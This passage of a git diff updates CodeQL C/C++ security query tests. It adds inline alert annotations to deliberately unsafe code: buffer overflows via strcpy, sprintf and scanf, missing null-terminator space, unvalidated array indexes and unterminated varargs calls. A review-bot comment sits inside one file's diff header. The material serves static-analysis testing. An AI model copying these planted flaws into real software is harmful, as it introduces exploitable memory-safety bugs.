argv[0]); // BAD: this could still overrun the 110 character buffer // $ Alert[cpp/badly-bounded-write] snprintf(buffer110, 109, "%s", argv[0]); // GOOD snprintf(buffer110, 110, "%s", argv[0]); // GOOD - snprintf(buffer110, 111, "%s", argv[0]); // BAD: this could still overrun the 110 character buffer + snprintf(buffer110, 111, "%s", argv[0]); // BAD: this could still overrun the 110 character buffer // $ Alert[cpp/badly-bounded-write] } // Test cases for OverrunWrite.ql 
@@ -51,16 +51,16 @@ int main(int argc, char *argv[]) char buffer10[10]; sprintf(buffer10, "123456789"); // GOOD - sprintf(buffer10, "1234567890"); // BAD: the null terminator of this string overruns the buffer + sprintf(buffer10, "1234567890"); // BAD: the null terminator of this string overruns the buffer // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer10, "%.9s", "123456789"); // GOOD sprintf(buffer10, "%.9s", "1234567890"); // GOOD sprintf(buffer10, "%.10s", "123456789"); // GOOD - sprintf(buffer10, "%.10s", "1234567890"); // BAD: the precision specified is too large for this buffer + sprintf(buffer10, "%.10s", "1234567890"); // BAD: the precision specified is too large for this buffer // $ Alert[cpp/very-likely-overrunning-write] scanf("%8s", buffer10); // GOOD: restricted to 8 characters + null scanf("%9s", buffer10); // GOOD: restricted to 9 characters + null - scanf("%10s", buffer10); // BAD: null can overflow - scanf("%11s", buffer10); // BAD: string can overflow + scanf("%10s", buffer10); // BAD: null can overflow // $ Alert[cpp/very-likely-overrunning-write] + scanf("%11s", buffer10); // BAD: string can overflow // $ Alert[cpp/very-likely-overrunning-write] } // More complex tests for OverrunWrite.ql @@ -83,14 +83,14 @@ int main(int argc, char *argv[]) { str35 = "12345"; } - strcpy(buffer5, str35); // BAD: if str35 is "12345", it overflows the buffer + strcpy(buffer5, str35); // BAD: if str35 is "12345", it overflows the buffer // $ Alert[cpp/very-likely-overrunning-write] str35 = "abc"; strcpy(buffer5, str35); // GOOD: str35 is guaranteed to fit now strcpy(buffer5, (argc == 2) ? "1234" : "abcd"); // GOOD: both of the strings fit - strcpy(buffer5, (argc == 2) ? "1234" : "abcde"); // BAD: "abcde" overflows the buffer + strcpy(buffer5, (argc == 2) ? "1234" : "abcde"); // BAD: "abcde" overflows the buffer // $ Alert[cpp/very-likely-overrunning-write] } // Test cases for OverrunWriteFloat.ql 
@@ -100,9 +100,9 @@ int main(int argc, char *argv[]) double bigval = 1e304; sprintf(buffer256, "%e", bigval); // GOOD - sprintf(buffer256, "%f", bigval); // BAD: this %f representation may need more than 256 characters + sprintf(buffer256, "%f", bigval); // BAD: this %f representation may need more than 256 characters // $ Alert[cpp/overrunning-write-with-float] sprintf(buffer256, "%g", bigval); // GOOD - sprintf(buffer256, "%e%f%g", bigval, bigval, bigval); // BAD: the %f representation may need more than 256 characters + sprintf(buffer256, "%e%f%g", bigval, bigval, bigval); // BAD: the %f representation may need more than 256 characters // $ Alert[cpp/overrunning-write-with-float] // GOOD: a 999 character buffer is sufficient in all of these cases sprintf(buffer999, "%e", bigval); // GOOD @@ -117,8 +117,8 @@ int main(int argc, char *argv[]) char buffer16[16]; char buffer17[17]; char buffer49[49]; - sprintf(buffer1, "%p", argv); // BAD - sprintf(buffer16, "%p", argv); // BAD + sprintf(buffer1, "%p", argv); // BAD // $ Alert[cpp/very-likely-overrunning-write] + sprintf(buffer16, "%p", argv); // BAD // $ Alert[cpp/very-likely-overrunning-write] sprintf(buffer17, "%p", argv); // GOOD sprintf(buffer49, "%p and then a few more words", argv); // GOOD } @@ -133,7 +133,7 @@ void test_fn2() MyCharArray myBuffer10; sprintf(myBuffer10, "%s", "123456789"); // GOOD - sprintf(myBuffer10, "%s", "1234567890"); // BAD: buffer overflow + sprintf(myBuffer10, "%s", "1234567890"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] } // --- @@ -183,10 +183,10 @@ void tesHexBounds(int x) { } if (x < 16) { - sprintf(buffer2, "%x", x); // BAD: negative values + sprintf(buffer2, "%x", x); // BAD: negative values // $ Alert[cpp/very-likely-overrunning-write] } if (x <= 16 && x > 0) { - sprintf(buffer2, "%x", x); // BAD: bound too loose + sprintf(buffer2, "%x", x); // BAD: bound too loose // $ Alert[cpp/very-likely-overrunning-write] } if(x < 0x10000 && x > 0) { 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests2.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests2.cpp
index c492e11f0b89..4be5107a6a0d 100644
--- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests2.cpp
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/tests2.cpp
@@ -15,36 +15,36 @@ void tests2() { buffer = (wchar_t *)malloc(2 * sizeof(wchar_t)); wcscpy(buffer, L"1"); // GOOD - wcscpy(buffer, L"12"); // BAD: buffer overflow + wcscpy(buffer, L"12"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] free(buffer); buffer = (wchar_t *)malloc(3 * sizeof(wchar_t)); wcscpy(buffer, L"12"); // GOOD - wcscpy(buffer, L"123"); // BAD: buffer overflow + wcscpy(buffer, L"123"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] free(buffer); buffer = (wchar_t *)realloc(0, 4 * sizeof(wchar_t)); wcscpy(buffer, L"123"); // GOOD - wcscpy(buffer, L"1234"); // BAD: buffer overflow + wcscpy(buffer, L"1234"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] buffer = (wchar_t *)realloc(buffer, 5 * sizeof(wchar_t)); wcscpy(buffer, L"1234"); // GOOD - wcscpy(buffer, L"12345"); // BAD: buffer overflow + wcscpy(buffer, L"12345"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] free(buffer); buffer = (wchar_t *)calloc(6, sizeof(wchar_t)); wcscpy(buffer, L"12345"); // GOOD - wcscpy(buffer, L"123456"); // BAD: buffer overflow + wcscpy(buffer, L"123456"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] free(buffer); buffer = (wchar_t *)calloc(sizeof(wchar_t), 7); wcscpy(buffer, L"123456"); // GOOD - wcscpy(buffer, L"1234567"); // BAD: buffer overflow + wcscpy(buffer, L"1234567"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] free(buffer); buffer = new wchar_t[8]; wcscpy(buffer, L"1234567"); // GOOD - wcscpy(buffer, L"12345678"); // BAD: buffer overflow + wcscpy(buffer, L"12345678"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] delete [] buffer; } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/unions.c b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/unions.c index 68c9aff9c2b5..6d0f0f8ca9d7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/unions.c 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/unions.c @@ -23,8 +23,8 @@ void unions_test(MyUnion *mu) strcpy(&(mu->ptr), "1234567890"); // GOOD (dubious) strcpy(&(mu->buffer), "1234567890"); // GOOD strcpy(mu, "12345678901234567890"); // BAD [NOT DETECTED] - strcpy(&(mu->ptr), "12345678901234567890"); // BAD - strcpy(&(mu->buffer), "12345678901234567890"); // BAD + strcpy(&(mu->ptr), "12345678901234567890"); // BAD // $ Alert[cpp/very-likely-overrunning-write] + strcpy(&(mu->buffer), "12345678901234567890"); // BAD // $ Alert[cpp/very-likely-overrunning-write] mu->ptr = buffer; strcpy(mu->ptr, "1234567890"); // GOOD diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/var_size_struct.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/var_size_struct.cpp index 56036aa76ac7..2a35ada2f232 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/var_size_struct.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/var_size_struct.cpp @@ -19,5 +19,5 @@ void testVarStruct() { vs->size = 9; strcpy(vs->data, "12345678"); // GOOD - strcpy(vs->data, "123456789"); // BAD: buffer overflow + strcpy(vs->data, "123456789"); // BAD: buffer overflow // $ Alert[cpp/very-likely-overrunning-write] } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/varbuffer.c b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/varbuffer.c index c4eed5068e5f..c01abbfbaa77 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/varbuffer.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-120/semmle/tests/varbuffer.c 
@@ -12,16 +12,16 @@ void testMyVarStruct() MyVarStruct *ptr1 = (MyVarStruct*)malloc(sizeof(MyVarStruct)); ptr1->len = 0; strcpy(ptr1->buffer, ""); // GOOD - strcpy(ptr1->buffer, "1"); // BAD: length 2, but destination only has length 1 - strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 1 + strcpy(ptr1->buffer, "1"); // BAD: length 2, but destination only has length 1 // $ Alert[cpp/very-likely-overrunning-write] + strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 1 // $ Alert[cpp/very-likely-overrunning-write] // ... MyVarStruct *ptr2 = (MyVarStruct*)malloc(sizeof(MyVarStruct) + (sizeof(char) * 10)); ptr2->len = 10; strcpy(ptr2->buffer, "123456789"); // GOOD strcpy(ptr2->buffer, "1234567890"); // GOOD - strcpy(ptr2->buffer, "1234567890a"); // BAD: length 12, but destination only has length 11 - strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 11 + strcpy(ptr2->buffer, "1234567890a"); // BAD: length 12, but destination only has length 11 // $ Alert[cpp/very-likely-overrunning-write] + strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 11 // $ Alert[cpp/very-likely-overrunning-write] // ... } 
@@ -36,14 +36,14 @@ void testMyFixedStruct() ptr1->len = 1; strcpy(ptr1->buffer, ""); // GOOD strcpy(ptr1->buffer, "1"); // GOOD - strcpy(ptr1->buffer, "12"); // BAD: length 3, but destination only has length 2 - strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 2 + strcpy(ptr1->buffer, "12"); // BAD: length 3, but destination only has length 2 // $ Alert[cpp/very-likely-overrunning-write] + strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 2 // $ Alert[cpp/very-likely-overrunning-write] // ... MyFixedStruct1 *ptr2 = (MyFixedStruct1*)malloc(sizeof(MyFixedStruct1) + (sizeof(char) * 10)); ptr2->len = 11; - strcpy(ptr2->buffer, "123456789"); // BAD / DUBIOUS: length 10, but destination only has length 2 - strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 2 + strcpy(ptr2->buffer, "123456789"); // BAD / DUBIOUS: length 10, but destination only has length 2 // $ Alert[cpp/very-likely-overrunning-write] + strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 2 // $ Alert[cpp/very-likely-overrunning-write] // ... } 
@@ -57,13 +57,13 @@ void testMyFixedStruct2() MyFixedStruct2 *ptr1 = (MyFixedStruct2 *)malloc(sizeof(MyFixedStruct2)); ptr1->len = 1; strcpy(ptr1->buffer, ""); // GOOD - strcpy(ptr1->buffer, "1"); // BAD: length 2, but destination only has length 1 - strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 1 + strcpy(ptr1->buffer, "1"); // BAD: length 2, but destination only has length 1 // $ Alert[cpp/very-likely-overrunning-write] + strcpy(ptr1->buffer, "123456789"); // BAD: length 10, but destination only has length 1 // $ Alert[cpp/very-likely-overrunning-write] // ... MyFixedStruct2 *ptr2 = (MyFixedStruct2*)malloc(sizeof(MyFixedStruct2) + (sizeof(char) * 10)); ptr2->len = 11; strcpy(ptr2->buffer, "123456789"); // BAD: length 10, but destination only has length 1 [NOT DETECTED] - strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 1 + strcpy(ptr2->buffer, "1234567890abcdef"); // BAD: length 17, but destination only has length 1 // $ Alert[cpp/very-likely-overrunning-write] // ... } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/UnterminatedVarargsCall.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/UnterminatedVarargsCall.qlref index 75497f34f937..c1cd5bb0da92 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/UnterminatedVarargsCall.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/UnterminatedVarargsCall.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-121/UnterminatedVarargsCall.ql \ No newline at end of file +query: Security/CWE/CWE-121/UnterminatedVarargsCall.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/more_tests.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/more_tests.cpp index d6c9a3915e7f..4d58c6ffbc66 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/more_tests.cpp 
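Review bot: The known false negative in `testMyFixedStruct2`, `strcpy(ptr2->buffer, "123456789"); // BAD: ... [NOT DETECTED]`, is still recorded only as free text, so the inline-expectations post-processing has nothing to check on that line. I would annotate it as `// $ MISSING: Alert[cpp/very-likely-overrunning-write]`, so that a later improvement to the query shows up as a fixed missing result instead of passing unnoticed. The same applies to the `i9 value comes from argv [NOT DETECTED]` case at the end of the `argvLocal.c` hunk, whose call lines fall outside that hunk. `testMyFixedStruct2` itself starts before this hunk.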
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/more_tests.cpp @@ -22,7 +22,7 @@ int main() myFunction2(0, 1, -1); myFunction2(0, 1, 2, -1); myFunction2(0, 1, 2, 3, -1); - myFunction2(0, 1, 2, 3, 4); // BAD: missing terminator + myFunction2(0, 1, 2, 3, 4); // BAD: missing terminator // $ Alert myFunction3(-1); myFunction3(0, -1); @@ -36,7 +36,7 @@ int main() myFunction4(0, 0, 1, 1, 0); myFunction4(0, x, 1, 1, 1, 0); myFunction4(0, 0, 1, 1, 1, 1, 0); - myFunction4(x, 0, 1, 1, 1, 1, 1); // BAD: missing terminator + myFunction4(x, 0, 1, 1, 1, 1, 1); // BAD: missing terminator // $ Alert myFunction5('a', 'b', 'c', 0); // GOOD: ambiguous terminator myFunction5('a', 'b', 'c', 0); @@ -46,7 +46,7 @@ int main() myFunction5('a', 'b', 'c', -1); myFunction6(0.0); - myFunction6(1.0); // BAD: missing terminator + myFunction6(1.0); // BAD: missing terminator // $ Alert myFunction6(1.0, 2.0, 0.0); myFunction6(1.0, 2.0, 3.0, 0.0); myFunction6(1.0, 2.0, 3.0, 4.0, 0.0); @@ -61,8 +61,8 @@ int main() myFunction7("seven", "eight", "nine", 0); myFunction7("alpha", "beta", "gamma", 0); myFunction7("", 0); - myFunction7("yes", "no"); // BAD: missing terminator - myFunction7(); // BAD: missing terminator + myFunction7("yes", "no"); // BAD: missing terminator // $ Alert + myFunction7(); // BAD: missing terminator // $ Alert return 0; } \ No newline at end of file diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/tests.c b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/tests.c index f89d19cf3c75..9ea3c57ba527 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/tests.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-121/semmle/tests/tests.c @@ -31,7 +31,7 @@ void f7(char *format, ...) int main(int argc, char *argv[]) { - f1("", 1); // BAD: not terminated with 0 + f1("", 1); // BAD: not terminated with 0 // $ Alert f1("", 1, 0); f1("", 1, 1, 0); f1("", 1, 1, 1, 0); 
@@ -75,13 +75,13 @@ int main(int argc, char *argv[]) f6("h", 5, -1); f6("i", 5, 6, -1); f6("j", 5, 6, 7, -1); - f6("k", 5, 6, argc); // BAD: not (necessarily) terminated with -1 - f6("l"); // BAD: not terminated with -1 + f6("k", 5, 6, argc); // BAD: not (necessarily) terminated with -1 // $ Alert + f6("l"); // BAD: not terminated with -1 // $ Alert f7("", 0); f7("", 0); f7("", 0); - f7(""); // BAD: not terminated with 0 + f7(""); // BAD: not terminated with 0 // $ Alert f7("", 0); f7("", 0); f7("", 0); diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c index 2092902b6658..97024d60eb34 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c @@ -27,7 +27,7 @@ void CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01_bad() { char inputBuffer[CHAR_ARRAY_SIZE] = ""; /* POTENTIAL FLAW: Read data from the console using fgets() */ - if (fgets(inputBuffer, CHAR_ARRAY_SIZE, stdin) != NULL) + if (fgets(inputBuffer, CHAR_ARRAY_SIZE, stdin) != NULL) // $ Source { /* Convert to int */ data = atoi(inputBuffer); @@ -49,7 +49,7 @@ void CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01_bad() * This code does check to see if the array index is negative */ if (data >= 0) { - buffer[data] = 1; + buffer[data] = 1; // $ Alert /* Print the array values */ for(i = 0; i < 10; i++) { 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected index 1fb824b35d6e..21a50d0a8fa1 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected @@ -1,3 +1,5 @@ +#select +| CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | An array indexing expression depends on $@ that might be outside the bounds of the array. | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | string read by fgets | edges | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | provenance | TaintFunction | | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | provenance | | 
@@ -6,5 +8,3 @@ nodes | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:33:13:33:36 | ... = ... | semmle.label | ... = ... | | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | semmle.label | data | subpaths -#select -| CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:52:20:52:23 | data | An array indexing expression depends on $@ that might be outside the bounds of the array. | CWE122_Heap_Based_Buffer_Overflow__c_CWE129_fgets_01.c:30:19:30:29 | fgets output argument | string read by fgets | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref index f1d46d8f8d64..71a6b5581453 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/SAMATE/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-129/ImproperArrayIndexValidation.ql \ No newline at end of file +query: Security/CWE/CWE-129/ImproperArrayIndexValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected index 184af69e72c4..3377b266d0a2 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.expected 
@@ -1,3 +1,8 @@ +#select +| test1.c:20:16:20:16 | i | test1.c:7:26:7:29 | **argv | test1.c:20:16:20:16 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:35:11:35:11 | i | test1.c:7:26:7:29 | **argv | test1.c:35:11:35:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:43:11:43:11 | i | test1.c:7:26:7:29 | **argv | test1.c:43:11:43:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | +| test1.c:55:15:55:15 | j | test1.c:7:26:7:29 | **argv | test1.c:55:15:55:15 | j | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | edges | test1.c:7:26:7:29 | **argv | test1.c:8:11:8:14 | call to atoi | provenance | TaintFunction | | test1.c:8:11:8:14 | call to atoi | test1.c:9:9:9:9 | i | provenance | | 
@@ -30,8 +35,3 @@ nodes | test1.c:53:3:53:7 | ... = ... | semmle.label | ... = ... | | test1.c:55:15:55:15 | j | semmle.label | j | subpaths -#select -| test1.c:20:16:20:16 | i | test1.c:7:26:7:29 | **argv | test1.c:20:16:20:16 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:35:11:35:11 | i | test1.c:7:26:7:29 | **argv | test1.c:35:11:35:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:43:11:43:11 | i | test1.c:7:26:7:29 | **argv | test1.c:43:11:43:11 | i | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | -| test1.c:55:15:55:15 | j | test1.c:7:26:7:29 | **argv | test1.c:55:15:55:15 | j | An array indexing expression depends on $@ that might be outside the bounds of the array. | test1.c:7:26:7:29 | **argv | a command-line argument | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref index f1d46d8f8d64..71a6b5581453 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/ImproperArrayIndexValidation.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-129/ImproperArrayIndexValidation.ql \ No newline at end of file +query: Security/CWE/CWE-129/ImproperArrayIndexValidation.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/test1.c b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/test1.c index 89619626de91..a92689a48d32 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/test1.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-129/semmle/ImproperArrayIndexValidation/test1.c @@ -4,7 +4,7 @@ void dosomething(char c); const char chr[26] = "abcdefghijklmnopqrstuvwxyz"; -int main(int argc, char *argv[]) { +int main(int argc, char *argv[]) { // $ Source int i = atoi(argv[1]); test1(i); test2(i); @@ -17,7 +17,7 @@ int main(int argc, char *argv[]) { void test1(int i) { // BAD: i has not been validated. - char c = chr[i]; + char c = chr[i]; // $ Alert dosomething(c); } @@ -32,7 +32,7 @@ void test2(int i) { int myArray[10]; void test3(int i) { - myArray[i] = 0; // BAD: i has not been validated + myArray[i] = 0; // BAD: i has not been validated // $ Alert i = 5; @@ -40,7 +40,7 @@ void test3(int i) { } void test4(int i) { - myArray[i] = 0; // BAD: i has not been validated + myArray[i] = 0; // BAD: i has not been validated // $ Alert if ((i < 0) || (i >= 10)) return; @@ -52,7 +52,7 @@ void test5(int i) { j = i; - j = myArray[j]; // BAD: j has not been validated + j = myArray[j]; // BAD: j has not been validated // $ Alert } extern int myTable[256]; diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/NoSpaceForZeroTerminator.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/NoSpaceForZeroTerminator.qlref index 53beb09ebd71..0459fddee60f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/NoSpaceForZeroTerminator.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/NoSpaceForZeroTerminator.qlref 
@@ -1 +1,2 @@ -Security/CWE/CWE-131/NoSpaceForZeroTerminator.ql +query: Security/CWE/CWE-131/NoSpaceForZeroTerminator.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.c index 551b2441a41c..15de6c31dec4 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.c @@ -13,7 +13,7 @@ char *strcpy(char *s1, const char *s2); static void bad0(char *str) { // BAD -- Not allocating space for '\0' terminator - char *buffer = malloc(strlen(str)); + char *buffer = malloc(strlen(str)); // $ Alert strcpy(buffer, str); free(buffer); } @@ -29,7 +29,7 @@ static void good0(char *str) { static void bad1(char *str) { int len = strlen(str); // BAD -- Not allocating space for '\0' terminator - char *buffer = malloc(len); + char *buffer = malloc(len); // $ Alert strcpy(buffer, str); free(buffer); } @@ -46,7 +46,7 @@ static void good1(char *str) { static void bad2(char *str) { int len = strlen(str); // BAD -- Not allocating space for '\0' terminator - char *buffer = malloc(len); + char *buffer = malloc(len); // $ Alert strcpy(buffer, str); free(buffer); } @@ -61,7 +61,7 @@ static void good2(char *str) { static void bad3(char *str) { // BAD -- Not allocating space for '\0' terminator - char *buffer = malloc(strlen(str) * sizeof(char)); + char *buffer = malloc(strlen(str) * sizeof(char)); // $ Alert strcpy(buffer, str); free(buffer); } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.cpp index 24032a91ef15..f6c44301a682 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.cpp 
+++ b/cpp/ql/test/query-tests/Security/CWE/CWE-131/NoSpaceForZeroTerminator/test.cpp @@ -21,14 +21,14 @@ int strcmp(const char *s1, const char *s2); static void bad1(wchar_t *wstr) { // BAD -- Not allocating space for '\0' terminator - wchar_t *wbuffer = (wchar_t *)malloc(wcslen(wstr)); + wchar_t *wbuffer = (wchar_t *)malloc(wcslen(wstr)); // $ Alert wcscpy(wbuffer, wstr); free(wbuffer); } static void bad2(wchar_t *wstr) { // BAD -- Not allocating space for '\0' terminator - wchar_t *wbuffer = (wchar_t *)malloc(wcslen(wstr) * sizeof(wchar_t)); + wchar_t *wbuffer = (wchar_t *)malloc(wcslen(wstr) * sizeof(wchar_t)); // $ Alert wcscpy(wbuffer, wstr); free(wbuffer); } @@ -42,7 +42,7 @@ static void good1(wchar_t *wstr) { static void bad3(char *str) { // BAD -- zero-termination proved by sprintf (as destination) - char *buffer = (char *)malloc(strlen(str)); + char *buffer = (char *)malloc(strlen(str)); // $ Alert sprintf(buffer, "%s", str); free(buffer); } @@ -52,7 +52,7 @@ void wdecode(wchar_t *dest, wchar_t *src); static void bad4(char *str) { // BAD -- zero-termination proved by wprintf (as parameter) - char *buffer = (char *)malloc(strlen(str)); + char *buffer = (char *)malloc(strlen(str)); // $ Alert decode(buffer, str); wprintf(L"%s", buffer); free(buffer); @@ -60,7 +60,7 @@ static void bad4(char 